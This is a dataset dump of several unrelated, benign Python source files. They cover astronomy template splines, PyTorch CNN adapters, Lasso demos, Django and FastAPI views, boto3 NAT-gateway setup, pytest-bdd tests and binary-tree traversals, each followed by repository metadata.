                               'f', 'f', 'f', 'f', 'f', 'f', 'f')},
            skiprows=1, comments='#')
        print("reading files list ", f, " worked")
    except (IOError, OSError, ValueError):
        # BUG FIX: the original bare "except" only printed a message and
        # fell through, crashing later on the undefined name "templates";
        # fail loudly instead.
        print("reading files list ", f, " failed")
        raise

    sne = []
    print("the templates are: ", templates['sn'])
    for i, sn in enumerate(templates['sn']):
        sne.append(templatesn(sn, dist=templates[i]['dist'],
                              e_dist=templates[i]['e_dist'],
                              incl=templates[i]['incl'],
                              ebv=templates[i]['ebv'],
                              sntype=templates[i]['type'],
                              mjdmax=templates[i]['mjdmax'],
                              e_mjdmax=templates[i]['e_mjdmax'],
                              ebmvhost=templates[i]['ebmvhost'],
                              vmr=templates[i]['vmr'],
                              peak=templates[i]['peak'],
                              e_peak=templates[i]['e_peak'],
                              peak_ap=templates[i]['peak_ap'],
                              e_peak_ap=templates[i]['e_peak_ap']))
        # photometry columns: (mjd, mag, dmag) for the requested band
        sne[i].phot = (np.loadtxt(TEMPLDIR + "/" + "sn" + sn + ".dat",
                                  usecols=(0, bandscols[band], bandscols[band] + 1),
                                  skiprows=1, unpack=1))
        # Milky-Way reddening correction (R ~ 3.2)
        # NOTE(review): de-reddening normally *subtracts* extinction from
        # magnitudes -- confirm the sign here is intended.
        sne[i].phot[1] += 3.2 * sne[i].ebv
        # absolute magnitudes from the apparent/absolute peak difference,
        # then peak-normalised magnitudes
        sne[i].absphot = sne[i].phot[1] - (sne[i].peak_ap - sne[i].peak)
        sne[i].normphot = sne[i].absphot - sne[i].peak

    print("loaded sne")
    return sne, templates
def splinetemplates(sne):
    # Resample every SN's peak-normalised photometry onto the common epoch
    # grid NEW_X via cubic interpolation, falling back to linear when the
    # cubic spline is all-NaN or wildly oscillating.  Mutates and returns sne.
    for s in sne:
        # pl.figure()
        # minx=max(-20.1,min(s['phot'][0]-s['mjdmax']))+0.1
        # maxx=min(40.1,max(s['phot'][0]-s['mjdmax']))-0.1
        s.new_x = NEW_X
        # epochs relative to maximum -> normalised magnitudes, cubic spline
        s.new_y = interp1d(s.phot[0]-s.mjdmax, s.normphot, kind='cubic',
                           bounds_error=False)(s.new_x)
        NaN = float('nan')  # NOTE(review): unused local
        print (np.sum(np.isnan(np.array(s.new_y))), np.isnan(np.array(s.new_y).all()),
               len(s.new_y))
        if np.sum(np.isnan(np.array(s.new_y))) == len(s.new_y):
            # cubic spline produced nothing usable: redo with linear
            print ("REDOING SPLINE WITH LINEAR")
            s.new_y = interp1d(s.phot[0]-s.mjdmax, s.normphot, kind='linear',
                               bounds_error=False)(s.new_x)
        if np.std(np.array(s.new_y[~np.isnan(s.new_y)])) > 10:
            # cubic spline oscillates wildly (> 10 mag scatter): use linear
            s.new_y = interp1d(s.phot[0]-s.mjdmax, s.normphot, kind='linear',
                               bounds_error=False)(s.new_x)
        # print (s['new_y'], s['normphot'])
        print (s.sn, np.min(s.new_y[~np.isnan(s.new_y)]))
    return sne
| fedhere/SESNCfAlib | templates/templutils.py | templutils.py | py | 21,005 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.realpath",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.abspath",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path.split",
"li... |
31594578113 | import torch
import torchvision
import torch.nn as nn
def get_vgg16():
    """VGG16 rewired for 1-channel input and a 4-class output head."""
    model = torchvision.models.vgg16(pretrained=False)
    # swap in a single-channel stem, keeping channel-0 weights of the old conv
    saved = model.features[0].weight.clone()
    model.features[0] = nn.Conv2d(1, 64, kernel_size=(3, 3), stride=(1, 1), padding=1)
    with torch.no_grad():
        model.features[0].weight[:, 0] = saved[:, 0]
    # replace the final classifier layer with a 4-class head
    model.classifier[6] = nn.Linear(in_features=4096, out_features=4, bias=True)
    return model
def get_resnet50():
    """ResNet-50 rewired for 1-channel input and a 4-class output head."""
    model = torchvision.models.resnet50(pretrained=False)
    # swap in a single-channel stem, keeping channel-0 weights of the old conv
    saved = model.conv1.weight.clone()
    model.conv1 = nn.Conv2d(1, 64, kernel_size=(7, 7), stride=(2, 2), padding=3)
    with torch.no_grad():
        model.conv1.weight[:, 0] = saved[:, 0]
    # replace the fully-connected head with a 4-class layer
    model.fc = nn.Linear(in_features=2048, out_features=4, bias=True)
    return model
def get_squeezenet():
    """SqueezeNet 1.0 rewired for 1-channel input and 4 output classes."""
    model = torchvision.models.squeezenet1_0(pretrained=False)
    # swap in a single-channel stem, keeping channel-0 weights of the old conv
    saved = model.features[0].weight.clone()
    model.features[0] = nn.Conv2d(1, 96, kernel_size=(7, 7), stride=(1, 1), padding=1)
    with torch.no_grad():
        model.features[0].weight[:, 0] = saved[:, 0]
    # SqueezeNet classifies with a final 1x1 conv instead of a Linear layer
    model.classifier[1] = nn.Conv2d(512, 4, kernel_size=(1, 1), stride=(1, 1))
    return model
def get_resnext():
    """ResNeXt-50 (32x4d) rewired for 1-channel input and 4 output classes."""
    model = torchvision.models.resnext50_32x4d(pretrained=False)
    # swap in a single-channel stem, keeping channel-0 weights of the old conv
    saved = model.conv1.weight.clone()
    model.conv1 = nn.Conv2d(1, 64, kernel_size=(7, 7), stride=(2, 2), padding=3)
    with torch.no_grad():
        model.conv1.weight[:, 0] = saved[:, 0]
    # replace the fully-connected head with a 4-class layer
    model.fc = nn.Linear(2048, 4, bias=True)
    return model
def get_densenet():
    """DenseNet-161 rewired for 1-channel input and 4 output classes."""
    model = torchvision.models.densenet161(pretrained=False)
    # swap in a single-channel stem, keeping channel-0 weights of the old conv
    saved = model.features.conv0.weight.clone()
    model.features.conv0 = nn.Conv2d(1, 96, kernel_size=(7, 7), stride=(2, 2), padding=3)
    with torch.no_grad():
        model.features.conv0.weight[:, 0] = saved[:, 0]
    # replace the classifier with a 4-class layer
    model.classifier = nn.Linear(2208, 4, bias=True)
    return model
def count_parameters(model):
return sum(p.numel() for p in model.parameters() if p.requires_grad) | hariharan98m/distinctive-filter-learning-covid19 | std_arch.py | std_arch.py | py | 2,094 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "torchvision.models.vgg16",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "torchvision.models",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torch.n... |
17978424885 | # 导入操作系统库
import os
# change the working directory
os.chdir(r"D:\softwares\applied statistics\pythoncodelearning\chap1\sourcecode")
# basic numerical library
import numpy as np
# plotting library
import matplotlib.pyplot as plt
# Lasso models
from sklearn.linear_model import MultiTaskLasso, Lasso
# font-management package of the plotting library
from matplotlib import font_manager
# make Chinese characters display correctly
font = font_manager.FontProperties(fname=r"C:\Windows\Fonts\SimKai.ttf")
# plot with the seaborn style
plt.style.use("seaborn-v0_8")
# sample size, number of features, dimension of y (multi-output regression)
n_samples, n_features, n_tasks = 100, 30, 40
# number of relevant (non-zero) features
n_relevant_features = 5
# initialise the true coefficients, a matrix
coef = np.zeros((n_tasks, n_features))
# time points
times = np.linspace(0, 2 * np.pi, n_tasks)
# set the random seed
np.random.seed(10)
# generate the true coefficients
for k in range(n_relevant_features):
    coef[:, k] = np.sin(
        (1.0 + np.random.randn(1)) * times + 3 * np.random.randn(1)
    )
# generate X
X = np.random.randn(n_samples, n_features)
# generate Y
Y = np.dot(X, coef.T) + np.random.randn(n_samples, n_tasks)
print("查看多元响应变量Y的情况:", Y[:5, :2], sep="\n")
# fit an independent Lasso per component of Y and collect the coefficients
coef_lasso_ = np.array(
    [
        Lasso(alpha=0.5).fit(X, y).coef_ for y in Y.T
    ]
)
# fit a MultiTaskLasso model and extract its coefficients
coef_multi_task_lasso_ = MultiTaskLasso(alpha=1.0).fit(X, Y).coef_
# start plotting
fig, axs = plt.subplots(nrows=1, ncols=2, figsize=(8, 5))
# spy() visualises the sparsity pattern of a 2-D array
axs[0].spy(coef_lasso_)
axs[0].set_xlabel("Feature")
axs[0].set_ylabel("Time (or Task)")
axs[0].text(10, 5, "Lasso")
axs[1].spy(coef_multi_task_lasso_)
axs[1].set_xlabel("Feature")
axs[1].set_ylabel("Time (or Task)")
axs[1].text(10, 5, "MultiTaskLasso")
fig.suptitle("Coefficient non-zero location")
plt.show()
fig.savefig("../codeimage/code15.pdf")
# plot the coefficients of the first feature
feature_to_plot = 0
# start plotting
fig1, ax = plt.subplots(figsize=(6,6), tight_layout=True)
# line plot of the true coefficients
ax.plot(
    coef[:, feature_to_plot],
    color="seagreen",
    linewidth=2,
    label="Ground truth"
)
# line plot of the per-task Lasso coefficients
ax.plot(
    coef_lasso_[:, feature_to_plot],
    color="cornflowerblue",
    linewidth=2,
    label="Lasso"
)
# line plot of the MultiTaskLasso coefficients
ax.plot(
    coef_multi_task_lasso_[:, feature_to_plot],
    color="gold",
    linewidth=2,
    label="MultiTaskLasso",
)
# show the legend
ax.legend(loc="best")
# set the y-axis limits
ax.set_ylim([-1.1, 1.1])
plt.show()
fig1.savefig("../codeimage/code16.pdf")
| AndyLiu-art/MLPythonCode | chap1/sourcecode/Python11.py | Python11.py | py | 2,671 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.chdir",
"line_number": 4,
"usage_type": "call"
},
{
"api_name": "matplotlib.font_manager.FontProperties",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "matplotlib.font_manager",
"line_number": 14,
"usage_type": "name"
},
{
"api_name":... |
13112139662 | from django.shortcuts import render, redirect, reverse
from django.contrib.auth.forms import AuthenticationForm
from django.contrib.auth import login as auth_login, logout as auth_logout
from django.contrib import messages
from django.utils.translation import ugettext as _
from .forms import RegistrationForm
def login(request):
    """Display and process the login form.

    Already-authenticated users are redirected home; on a valid POST the
    user is logged in and redirected home; otherwise the (possibly bound,
    invalid) form is re-rendered.
    """
    login_form = AuthenticationForm()

    if request.user.is_authenticated():
        return redirect('/')

    # BUG FIX: test the request method, not the POST dict -- an empty POST
    # body is falsy and would silently skip form validation.
    if request.method == 'POST':
        login_form = AuthenticationForm(request, data=request.POST)

        if login_form.is_valid():
            auth_login(request, login_form.get_user())
            return redirect('/')

    context = {
        'form': login_form,
    }

    return render(request, template_name='account/login.html', context=context)
def logout(request):
    """Log the current user out, flash a notice and go to the login page."""
    auth_logout(request)
    # the message is queued after logout so it survives into the fresh session
    notice = _('You\'ve been logged out.')
    messages.add_message(request, messages.WARNING, notice)
    return redirect(reverse('login'))
def register(request):
register_form = RegistrationForm()
if request.user.is_authenticated():
return redirect('/')
if request.POST:
register_form = RegistrationForm(request.POST)
if register_form.is_valid():
user = register_form.save()
auth_login(request, user)
messages.add_message(request, messages.SUCCESS, _('Your account has been registered.'))
return redirect('/')
context = {
'form': register_form
}
return render(request, template_name='account/register.html', context=context) | roccolangeweg-old/infdev016b | account/views.py | views.py | py | 1,546 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.forms.AuthenticationForm",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.redirect",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "django.contrib.auth.forms.AuthenticationForm",
"line_number": 16,
... |
477387110 | """A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
# directory containing this setup.py, used to resolve README.md reliably
here = path.abspath(path.dirname(__file__))

# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
    long_description = f.read()

setup(
    name='mygrations',
    version='1.0.6',
    description='A general purpose migration tool for managing MySQL updates',
    long_description=long_description,
    long_description_content_type='text/markdown',
    url='https://github.com/cmancone/mygrations',
    author='Conor Mancone',
    author_email='cmancone@gmail.com',
    license='MIT',
    # NOTE(review): download_url points at the v1.0.0 tag while version is
    # 1.0.6 -- confirm the intended release tag
    download_url='https://github.com/cmancone/mygrations/archive/v1.0.0.tar.gz',

    # See https://pypi.python.org/pypi?%3Aaction=list_classifiers
    classifiers=[
        'Development Status :: 4 - Beta',
        'Intended Audience :: Developers',
        'Topic :: Software Development :: Build Tools',
        'License :: OSI Approved :: MIT License',
        'Programming Language :: Python :: 3',
    ],

    keywords='setuptools development migrations mysql',
    packages=find_packages(exclude=['contrib', 'docs', 'tests']),
    python_requires=">=3.6",
    install_requires=[
        'PyMySQL',
    ],

    # http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files
    # data_files=[('/usr/local/bin', ['mygrate.py'])],
)
| cmancone/mygrations | setup.py | setup.py | py | 1,605 | python | en | code | 10 | github-code | 36 | [
{
"api_name": "os.path.abspath",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "os.path.dirname",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "codecs.open",
"line_numbe... |
39274582010 | from fastapi import APIRouter, Depends, HTTPException
from pyairtable.api.table import Table
from pyairtable.formulas import match
from sentry_sdk import capture_message
from app.auth.auth_bearer import JWTBearer
from app.routers.attendees import update_attendee
from ..dependencies import get_mobile_table, get_registration_table
from ..auth.auth_handler import verify_jwt, decode_jwt
from ..models.attendee import UpdatedAttendee, recordToAttendee
router = APIRouter(prefix="/verify", tags=["verify"])
@router.get("/discord", dependencies=[Depends(JWTBearer())])
async def verify_discord(
    email: str, disc_username: str, table: Table = Depends(get_mobile_table)
):
    """Attach a Discord username to the attendee matching *email*.

    Raises 400 when no attendee matches or a username is already set,
    500 when the Airtable update fails.  Returns (first_name, last_name).
    """
    # all attendees whose Email field matches; only the first is used
    matches = [
        recordToAttendee(rec) for rec in table.all(formula=match({"Email": email}))
    ]

    if not matches:
        capture_message("No user with specified email found.")
        raise HTTPException(
            status_code=400,
            detail="No user with specified email found.",
        )

    user = matches[0]
    if user.discord_id:
        capture_message("Discord username already set.")
        raise HTTPException(
            status_code=400,
            detail="Discord username already set.",
        )

    try:
        table.update(user.airtable_id, {"Discord ID": disc_username})
    except Exception as exc:
        # BUG FIX: the original bare "except" also swallowed SystemExit and
        # KeyboardInterrupt; chain the cause so the Airtable error is kept.
        raise HTTPException(
            status_code=500, detail="Updating attendee failed"
        ) from exc

    return user.first_name, user.last_name
@router.get("/{token}")
async def verify_email(token: str, table: Table = Depends(get_registration_table)):
    """Mark an attendee's (parent or own) email as verified from a signed token.

    The JWT payload must carry "id" (Airtable record id) and "type"
    ("parent" selects the parent-email field).  Raises 403 for an invalid,
    expired or malformed token, or an unknown attendee.
    """
    # token is invalid or expired
    if not verify_jwt(token):
        capture_message("Invalid or expired verification link.")
        raise HTTPException(
            status_code=403,
            detail="Expired or invalid verification link. Please try registering again!",
        )

    payload = decode_jwt(token)
    # BUG FIX: use .get() -- indexing raised KeyError (an unhandled 500) on
    # tokens lacking these claims instead of the intended 403 below.
    attendee_id = payload.get("id")
    email_type = payload.get("type")

    if not attendee_id or not email_type:
        capture_message("Invalid verification link.")
        raise HTTPException(status_code=403, detail="Invalid verification link.")

    field_name = "Parent Email Verified" if email_type == "parent" else "Email Verified"

    try:
        attendee = table.update(attendee_id, {field_name: True})
        fields = attendee["fields"]
        return {
            "parent_email_verified": fields.get("Parent Email Verified", False),
            "email_verified": fields.get("Email Verified", False),
        }
    except Exception as exc:
        # attendee does not exist (or the Airtable call failed)
        capture_message("Invalid attendee ID.")
        raise HTTPException(status_code=403, detail="Invalid attendee ID.") from exc
| LosAltosHacks/api | app/routers/verify.py | verify.py | py | 3,095 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "fastapi.APIRouter",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pyairtable.api.table.Table",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "fastapi.Depends",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "dependen... |
41499034466 | from abc import ABC, abstractmethod
import logging
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.orm.session import Session
from sqlalchemy.pool import NullPool
from os import getenv
from dotenv import load_dotenv
from models import BaseTable
class Collector(ABC):
    """Abstract base for collectors: owns a DB session factory and a logger.

    Subclasses implement `_collect_surfaces` and `_collect_images`.
    """

    def __init__(self) -> None:
        self.session_factory = SessionHandler()
        # set up logging
        self.logger = logging.getLogger(__name__)
        logging.basicConfig(
            level=logging.INFO,
            format='%(levelname)s-%(threadName)s: %(message)s'
        )

    @abstractmethod
    def _collect_surfaces(self, bag_building_id: str):
        # Subclass hook: collect surface data for the given BAG building id.
        raise NotImplementedError('Implement this')

    @abstractmethod
    def _collect_images(self, model: BaseTable):
        # Subclass hook: collect images for the given model row.
        raise NotImplementedError('Implement this')
class SessionHandler:
    """Builds SQLAlchemy sessions for the Postgres DB configured via .env."""

    # Class-level default; shadowed by the instance attribute set in __init__.
    engine = None

    def __init__(self, echo=False):
        load_dotenv()
        user = getenv('user')
        host = getenv('host')
        name = getenv('dbname')
        # NOTE(review): no password in the connection URL -- presumably
        # trust/peer auth is configured; confirm for new environments.
        # NullPool: every session gets a fresh connection, no pooling.
        self.engine = create_engine(
            f'postgresql://{user}:@{host}/{name}',
            poolclass=NullPool,
            echo=echo
        )

    def build(self) -> Session:
        """Return a new Session bound to this handler's engine."""
        return sessionmaker(bind=self.engine)()
| shivanrbn/BAG-Visualizer | src/bag_extractor/handler_base.py | handler_base.py | py | 1,286 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "abc.ABC",
"line_number": 13,
"usage_type": "name"
},
{
"api_name": "logging.getLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "logging.basicConfig",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "logging.INFO",
"lin... |
41702191179 | import os
import pytest
import textwrap
@pytest.fixture()
def sample_test(testdir):
    """Create a feature file plus a pytest-bdd test module whose final step fails."""
    testdir.makefile(
        ".feature",
        scenario=textwrap.dedent(
            """\
            Feature: Testing
                Scenario: Test scenario
                    Given I have a scenario
                    When I start the test
                    And I know it will fails
                    Then It fails
            """
        ),
    )
    testdir.makepyfile(
        textwrap.dedent(
            """\
            import pytest
            from pytest_bdd import given, when, then, scenario

            @scenario("scenario.feature", "Test scenario")
            def test_scenario():
                pass

            @given("I have a scenario")
            def _():
                pass

            @when("I start the test")
            def _():
                pass

            @when("I know it will fails")
            def _():
                pass

            @then('It fails')
            def _():
                assert False
            """
        )
    )
    return testdir
def test_arguments_in_help(testdir):
    """The --bdd-report option is advertised in pytest's --help output."""
    help_result = testdir.runpytest("--help")
    help_result.stdout.fnmatch_lines(["*bdd-report*"])
def test_create_html_report_file(sample_test):
    """--bdd-report creates the report file in the test dir."""
    sample_test.runpytest("--bdd-report=report.html")
    report_path = sample_test.tmpdir / "report.html"
    assert report_path.exists()
def test_create_html_report_file_with_directory(sample_test):
    """--bdd-report with a ./subdirectory path creates the directory too."""
    sample_test.runpytest("--bdd-report=./reports/report.html")
    report_path = sample_test.tmpdir / "./reports/report.html"
    assert report_path.exists()
def test_create_html_report_file_with_directory_name(sample_test):
    """--bdd-report with a bare directory name (no ./ prefix) also works."""
    sample_test.runpytest("--bdd-report=results/report.html")
    report_path = sample_test.tmpdir / "results/report.html"
    assert report_path.exists()
def test_create_html_report_file_with_directory_and_subdirectory(sample_test):
    """--bdd-report with nested directories creates the whole tree."""
    sample_test.runpytest("--bdd-report=./reports/year/report.html")
    report_path = sample_test.tmpdir / "./reports/year/report.html"
    assert report_path.exists()
def test_content_in_report(sample_test):
    """The generated report file is not empty."""
    sample_test.runpytest("--bdd-report=report.html")
    with open(sample_test.tmpdir / "report.html", "r") as report:
        assert report.read() != ""
def test_information_in_report(sample_test):
    """Feature name, scenario name and every step text appear in the report."""
    sample_test.runpytest("--bdd-report=report.html")
    with open(sample_test.tmpdir / "report.html", "r") as report:
        content = report.read()
    expected_fragments = [
        "Testing",
        "Test scenario",
        "I have a scenario",
        "I start the test",
        "I know it will fails",
        " It fails",
    ]
    for fragment in expected_fragments:
        assert fragment in content
| mattiamonti/pytest-bdd-report | tests/test_html_information/test_html_information.py | test_html_information.py | py | 2,631 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "textwrap.dedent",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "textwrap.dedent",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "pytest.fixture",
"line_number": 7,
"usage_type": "call"
}
] |
17245832907 | import datetime
import inspect
import json
import boto3
from util import create_ec2_client, create_ec2_resource, print_response
def create_elastic_ip(ec2_client):
    """Allocate a VPC Elastic IP and return its AllocationId."""
    # https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Client.allocate_address
    # Domain='vpc' targets a VPC; 'standard' would target EC2-Classic.
    result = ec2_client.allocate_address(Domain='vpc')
    print_response(inspect.getframeinfo(inspect.currentframe())[2], result)
    return result['AllocationId']
def create_nat_gateway(ec2_client, allocation_id, subnet_id):
    """Create a NAT gateway in *subnet_id* backed by the EIP *allocation_id*.

    Returns the new NAT gateway's id.
    """
    # https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Client.create_nat_gateway
    # Bug fix: the original called the module-global `client` instead of the
    # `ec2_client` parameter, so the function only worked when run as a script.
    response = ec2_client.create_nat_gateway(
        AllocationId=allocation_id,
        SubnetId=subnet_id,
    )
    print_response(inspect.getframeinfo(inspect.currentframe())[2], response)
    return response['NatGateway']['NatGatewayId']
def describe_main_route_tables(ec2_client, vpc_id):
    """Return the id of the main route table of *vpc_id*."""
    # https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Client.describe_route_tables
    filters = [
        {'Name': 'association.main', 'Values': ['true']},
        {'Name': 'vpc-id', 'Values': [vpc_id]},
    ]
    response = ec2_client.describe_route_tables(Filters=filters)
    main_route_table_id = response['RouteTables'][0]['RouteTableId']
    print_response(inspect.getframeinfo(inspect.currentframe())[2], main_route_table_id)
    return main_route_table_id
def wait_nat_gateway_available(ec2_client, nat_gateway_id):
    """Block until the NAT gateway reaches the 'available' state."""
    # https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.Waiter.NatGatewayAvailable
    print(f'NAT Gatewayがavailableになるまで待つ(開始):{datetime.datetime.now()}')
    result = ec2_client.get_waiter('nat_gateway_available').wait(
        Filters=[{'Name': 'state', 'Values': ['available']}],
        NatGatewayIds=[nat_gateway_id]
    )
    print_response(inspect.getframeinfo(inspect.currentframe())[2], result)
    print(f'NAT Gatewayがavailableになるまで待つ(終了):{datetime.datetime.now()}')
def create_nat_gateway_route_in_route_table(ec2_resource, route_table_id, nat_gateway_id):
    """Add a default (0.0.0.0/0) route via the NAT gateway; return the Route."""
    # https://boto3.readthedocs.io/en/latest/reference/services/ec2.html#EC2.RouteTable.create_route
    default_route = ec2_resource.RouteTable(route_table_id).create_route(
        DestinationCidrBlock='0.0.0.0/0',
        NatGatewayId=nat_gateway_id,
    )
    print_response(inspect.getframeinfo(inspect.currentframe())[2], default_route)
    return default_route
if __name__ == '__main__':
    session = boto3.Session(profile_name='my-profile')
    # Create the client and resource objects to use.
    client = create_ec2_client(session)
    resource = create_ec2_resource(session)
    # Load the AWS resource ids gathered by the previous chapters' scripts.
    with open('aws.json', mode='r') as f:
        aws = json.load(f)
    # Allocate an Elastic IP.
    aws['allocation_id'] = create_elastic_ip(client)
    # Place a NAT gateway in the public subnet.
    aws['nat_gateway_id'] = create_nat_gateway(client, aws['allocation_id'], aws['public_subnet_id'])
    # The NAT gateway cannot be used right away, so wait until it is available.
    wait_nat_gateway_available(client, aws['nat_gateway_id'])
    # Fetch the main route table id so the NAT gateway entry can be added to it.
    aws['main_route_table_id'] = describe_main_route_tables(client, aws['vpc_id'])
    # Add the NAT gateway entry to the main route table (VPC area 2).
    create_nat_gateway_route_in_route_table(resource, aws['main_route_table_id'], aws['nat_gateway_id'])
    # Persist the collected ids back to the JSON file.
    with open('aws.json', mode='w') as f:
        json.dump(aws, f)
| thinkAmi-sandbox/syakyo-aws-network-server-revised-edition-book | boto3_ansible/ch7.py | ch7.py | py | 3,976 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "util.print_response",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "inspect.getframeinfo",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "inspect.currentframe",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "util.pr... |
74050394344 | from parlai.core.teachers import DialogTeacher
from .build import build
import json
import os
import glob
def _path(opt):
    """Return (questions json path, images directory) for the requested datatype."""
    build(opt)
    print('opt is', opt['datatype'])
    dt = opt['datatype'].split(':')[0]
    if dt == 'valid':
        dt = 'dev'
    elif dt not in ('train', 'test'):
        raise RuntimeError('Not valid datatype.')
    prefix = os.path.join(opt['datapath'], 'nlvr', 'nlvr-master', 'nlvr')
    return (
        os.path.join(prefix, dt, dt + '.json'),
        os.path.join(prefix, dt, 'images'),
    )
class DefaultTeacher(DialogTeacher):
    """Dialog teacher for the NLVR true/false visual reasoning task."""

    # all possible answers for the questions
    cands = labels = ['true', 'false']

    def __init__(self, opt, shared=None):
        self.datatype = opt['datatype']
        data_path, self.images_path = _path(opt)
        opt['datafile'] = data_path
        self.id = 'nlvr'
        self.dt = opt['datatype'].split(':')[0]
        if self.dt == 'valid':
            # the dataset names its validation split 'dev'
            self.dt = 'dev'
        super().__init__(opt, shared)

    def label_candidates(self):
        # Fixed binary label set for this task.
        return self.cands

    def setup_data(self, path):
        """Yield ((question, answer, reward, candidates, image), new_episode).

        Each line of the data file is one JSON example; the matching image is
        located by globbing the images directory.
        """
        print('loading: ' + path)
        for line in open(path, 'r'):
            ques = json.loads(line)
            image_path = os.path.join(self.images_path, ques['directory'])
            image_file_names = glob.glob(
                image_path + '/' + self.dt + '-' + ques['identifier'] + '*'
            )
            question = "True or False: " + ques['sentence']
            # Test split has no labels exposed.
            answer = [ques['label']] if self.dt != 'test' else None
            # print( answer)
            # NOTE(review): assumes at least one image matches the glob; an
            # example with no image file raises IndexError -- confirm upstream.
            yield (question, answer, None, None, image_file_names[0]), True
| facebookresearch/ParlAI | parlai/tasks/nlvr/agents.py | agents.py | py | 1,680 | python | en | code | 10,365 | github-code | 36 | [
{
"api_name": "build.build",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
"line_number... |
72517026344 | from setuptools import find_packages, setup
from typing import List
import io
import os
def parse_requirements(filename: str) -> List[str]:
    """Read a requirements file (relative to this script) into a list.

    Blank lines and ``#`` comment lines are skipped; the original version
    returned them as empty/comment entries, which confuses setuptools.
    """
    path = os.path.join(os.path.dirname(__file__), filename)
    with open(path) as req_file:
        stripped = (line.strip() for line in req_file)
        return [line for line in stripped if line and not line.startswith("#")]
setup(
    name='ml_pet',
    packages=find_packages(),
    python_requires=">=3.6",
    install_requires=parse_requirements("requirements.txt"),
    # Fixed typo: setuptools expects `extras_require` (a mapping of extra
    # name -> requirement list); the misspelled `extras_requires` kwarg was
    # silently ignored, so `pip install ml_pet[dev]` never worked.
    extras_require={"dev": parse_requirements("requirements-dev.txt")},
    version='0.1.0',
    description='A python repository of research and utility code for analysis of PET image reconstructions and automatic detection of parathyroid adenomas from [F-18]-FCH PET/CT',
    author='Filip Cvetko',
    license='MIT',
)
| FilipCvetko/ml_pet | setup.py | setup.py | py | 818 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "os.path.join",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "os.path.dirname",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "typing.List",
"line_number... |
15990910311 | from collections import deque
# For debugging
import time
#-----
# Define Node class
#-----
class Node:
    """A binary-tree node: a value plus optional left/right children."""

    def __init__(self, val, left=None, right=None):
        self.val = val
        self.left = left
        self.right = right

    def __repr__(self):
        return f"{self.val}"
#-----
# DFT - recursive
#-----
def dft(root, path=None):
    """Recursive depth-first (pre-order) traversal.

    Prints each visited value and returns the accumulated list of values.
    """
    if not root:
        return path
    path = path or []
    print(root.val, end=' ')
    path.append(root.val)
    for child in (root.left, root.right):
        dft(child, path)
    return path
#-----
# DFT - iterative
#-----
def dft_iter(root):
    """Iterative depth-first (pre-order) traversal using an explicit stack.

    Prints each visited value and returns the list of values (None for an
    empty tree, matching the recursive version).
    """
    if root is None:
        return
    visited = []
    stack = [root]
    while stack:
        current = stack.pop()
        visited.append(current.val)
        print(current.val, end=' ')
        # Push right before left so the left subtree is processed first.
        for child in (current.right, current.left):
            if child:
                stack.append(child)
    return visited
#-----
# BFT - iterative
#-----
def bft(root):
    """Breadth-first ("level-order") traversal; prints and returns values.

    Bug fix: the original returned the not-yet-defined `path` for an empty
    tree, raising NameError; an empty list is returned instead.
    """
    if root is None:
        return []
    path = []
    queue = deque([root])
    while queue:
        node = queue.popleft()
        path.append(node.val)
        print(node.val, end=' ')
        if node.left:
            queue.append(node.left)
        if node.right:
            queue.append(node.right)
    return path
#-----
# BST insert
#-----
def insert_bst(root, val):
    """Insert *val* into the BST rooted at *root*; return the (new) root.

    Duplicates go to the right subtree, matching the recursive original.
    """
    new_node = Node(val)
    if root is None:
        return new_node
    current = root
    while True:
        if val < current.val:
            if current.left is None:
                current.left = new_node
                break
            current = current.left
        else:
            if current.right is None:
                current.right = new_node
                break
            current = current.right
    return root
#-----
# BST lookup
#-----
def lookup_bst(root, val):
    """Return the first node whose value equals *val*, or None if absent."""
    node = root
    while node is not None:
        if node.val == val:
            print(f'Found value {val} in tree; returning node')
            return node
        node = node.left if val < node.val else node.right
